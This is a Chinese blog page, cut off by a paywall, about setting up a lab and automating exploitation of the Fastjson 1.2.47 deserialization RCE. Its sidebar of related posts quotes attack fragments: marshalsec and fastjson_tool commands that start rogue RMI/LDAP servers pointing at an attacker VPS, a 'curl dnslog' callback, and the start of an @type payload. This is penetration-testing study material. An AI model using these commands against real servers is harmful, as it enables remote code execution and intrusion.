Fastjson RCE续(自动化)

最新推荐文章于 2024-04-02 09:49:09 发布
原创 最新推荐文章于 2024-04-02 09:49:09 发布 · 2.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了Fastjson RCE漏洞的自动化利用过程,包括环境搭建、漏洞检测和漏洞利用两个工具的方法:marshalsec-0.0.3-SNAPSHOT-all.jar启用RMI/LDAP以及fastjson_tool.jar启用RMI/LDAP。提供了相关资源链接,并讨论了在调试过程中如何通过对比请求包来定位问题。

Fastjson RCE续(自动化)

一、漏洞介绍

参阅Fastjson≤1.2.47 RCE

二、漏洞危害

参阅Fastjson≤1.2.47 RCE

三、漏洞验证

环境搭建:
实验环境 系统 IP地址
攻击机 win10 199.200.234.44
靶机 Centos7 192.168.134.133 
docker pull vulhub/fastjson     #拉取镜像
docker run -d -p 8080:8080 -p 8443:8443 initidc/fastjson1.2.47_rce    #连接容器

验证一下环境是否正常:
在这里插入图片描述
在这里插入图片描述

漏洞检测:

这里推荐两款BurpSuite插件:
https://mp.weixin.qq.com/s/5jNTjRwTZOzWJh0Hdu7jEw
https://github.com/uknowsec/BurpSuite-Extender-fastjson
安装插件后

最低0.47元/天 解锁文章
FastJson1.2.24/47 Rce
weixin_44687621的博客
04-22 662
之前只在本地测试过FastJson的漏洞,实战情况下一般需要利用VPS反弹shell,这里尝试一下 环境 https://buuoj.cn/challenges#[FastJson]1.2.24-rce 构建rmi服务器工具marshalsec https://github.com/RandomRobbieBF/marshalsec-jar.git FastJson1.2.24 首先编写恶意类 import java.lang.Runtime; public class Exploit{ publ
网络安全--Fastjson1.2.24-RCE漏洞
最新发布
weixin_46066254的博客
12-04 835
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,autoType标注了类对应的原始类型,方便在反序列化的时候定位到具体类型,fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。因为有了autoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。
marshalsec-0.0.3-SNAPSHOT-all.jar
08-23
Moritz Bechler编写,源码地址为:https://github.com/mbechler/marshalsec下载下来之后使用maven编译,此工具为编译好的jar包,方便没有编译环境的同学们直接jar包开启ldap和rmi服务 开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 开启ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 我使用这个来测试springboot jolokia的远程命令执行,也可以测试struts2 S系列的漏洞
fastjsonRCE漏洞复现记录
beijiao3982的博客
07-31 1020
参考链接: https://paper.seebug.org/994/https://www.cnblogs.com/jinqi520/p/11097779.htmlhttps://xz.aliyun.com/t/5680 0x01 漏洞复现 RMi 1. payload: {"@type":"java.lang.Class",br/>"a":{"@type":"java.lang.Cla...
精选资源
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
精选资源
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
FastjsonRCE漏洞通常是由于其自动类型转换机制引发的。当Fastjson尝试将接收到的JSON字符串反序列化为Java对象时,如果未能正确验证输入,就可能触发恶意代码的执行。攻击者可以通过构造特定的JSON字符串,诱使...
fastjson1.2.24反序列化RCE
06-24
2. **禁用自动类型转换**:在使用Fastjson时,可以设置`FastJSONConfig`来禁用`AutoTypeSupport`,防止恶意类型被反序列化。 3. **数据验证**:在反序列化之前,对输入的JSON数据进行严格的验证,确保其符合预期的...
fastjson RCE 它叒叒来了...
chennqqi的专栏
05-29 154
隔壁群里看到一个图version<=1.2.68目前官方还没出修订版企鹅家发公告了,目前说是开启SafeMode可以缓解 ...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
探索Fastjson-1.2.47 RCE:一个强大的Java JSON库的安全与潜力
gitblog_00080的博客
04-02 789
探索Fastjson-1.2.47 RCE:一个强大的Java JSON库的安全与潜力 在软件开发中,JSON(JavaScript Object Notation)已经成为了数据交换的标准格式。处理JSON数据时,一个可靠的解析和生成库是必不可少的工具。【Fastjson((https://github.com/alibaba/fastjson))是阿里巴巴开源的一款高性能、功能丰富的Java...
探索BurpSuite Extender快文(fastjson)插件:高效渗透测试的新武器
gitblog_00086的博客
03-30 913
探索BurpSuite Extender快文(fastjson)插件:高效渗透测试的新武器 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的世界里,渗透测试是评估网站和应用程序安全性的重要步骤。而BurpSuite是一款备受推崇的Web应用安全测试工具,它提供了全面的功能来辅助测试人员进行漏洞发现和利用。现在,让我们一起了解一个能够进一步增强BurpSuite功能的扩...
Java - FastjsonRCE攻击模拟(远程代码执行漏洞)
Zong_0915的博客
12-03 1905
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞)Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
最新版本marshalsec
Fly_鹏程万里
05-11 6028
工具下载 marshalsec-0.3.0.3-SNAPSHOT-all.jar下载 下载地址:https://download.csdn.net/download/Fly_hps/12409277 工具使用 命令格式 marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [&
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1935
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
weblogic 反序列化 (CVE-2020-2551)漏洞复现(vulfocus)
qq_40646572的博客
04-27 3944
weblogic 反序列化 (CVE-2020-2551)漏洞是基于IIOP协议执行远程代码进行利用。
BurpSuite扩展插件:自动检测fastjson RCE漏洞
在这个过程中,利用BurpSuite-Extender-fastjson插件,他们可以自动化检测目标应用是否存在fastjson库的RCE漏洞。这种方法极大地提高了安全测试的效率,使得安全工程师能够快速识别出可能被利用的安全弱点,从而采取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值